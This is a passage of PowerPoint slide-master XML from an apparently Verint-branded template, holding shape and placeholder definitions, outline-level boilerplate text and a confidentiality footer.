          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="CustomShape 291"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9291600" y="3994200"/>
            <a:ext cx="14040" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="CustomShape 292"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9366120" y="3992400"/>
            <a:ext cx="45720" cy="150480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="CustomShape 293"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9455040" y="3994200"/>
            <a:ext cx="60120" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="CustomShape 294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9545760" y="3994200"/>
            <a:ext cx="64800" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="CustomShape 295"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9655200" y="3994200"/>
            <a:ext cx="12240" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="CustomShape 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9728280" y="3992400"/>
            <a:ext cx="48960" cy="150480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="CustomShape 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9828360" y="3994200"/>
            <a:ext cx="47160" cy="145800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="PlaceHolder 298"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658800" y="1928520"/>
            <a:ext cx="9143640" cy="2387160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the title text formatClick to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="PlaceHolder 299"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="6">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Seventh Outline Level</a:t>
            </a:r>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78" name="Picture 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982880" y="6483240"/>
            <a:ext cx="758880" cy="178560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="11233800" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="2742840" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{537F9D1C-77FF-40D0-9E7A-7BEF8D7F488C}" type="slidenum">
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="381" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="8923" r="460" b="10873"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="6883200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="6857640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4063680" cy="6857640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588600" y="1700640"/>
            <a:ext cx="3475080" cy="1620720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Seventh Outline LevelAgenda</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336560" y="1307880"/>
            <a:ext cx="8024400" cy="401400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Seventh Outline LevelClick to edit master text styles</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336560" y="2102760"/>
            <a:ext cx="8024400" cy="401760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Seventh Outline LevelClick to edit master text styles</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="PlaceHolder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336560" y="2906640"/>
            <a:ext cx="8024400" cy="402120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Seventh Outline LevelClick to edit master text styles</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="PlaceHolder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336560" y="3724200"/>
            <a:ext cx="8024400" cy="401040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
